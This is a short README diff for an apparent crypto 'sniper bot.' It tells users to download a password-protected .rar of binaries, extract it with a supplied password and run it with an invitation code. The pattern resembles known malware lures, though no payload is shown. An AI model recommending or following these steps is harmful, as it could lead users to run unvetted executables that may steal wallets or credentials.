AlchemismCrypto/crypto-sniper-bot/README.md

 Full installation guide here: [Alchemism Installation](https://alchemism.io/docs/getting-started/installation.html)

 1. [Download](https://github.com/AlchemismCrypto/crypto-sniper-bot/releases/download/Release/AlchemismLite-2.0.3.rar) latest release of AlchemismLite.
-2. Extract the binary files using password `release203` (actual password provided in the README.txt file of the archive).
+2. Extract the binary files using password `release203` (actual password provided in the ReleaseNotes.txt file).
 3. Run the program and enter the AlchemismLite invitation code.
 For the public version, invitation codes are similar to licenses.
 4. After activation the program is ready for configuration.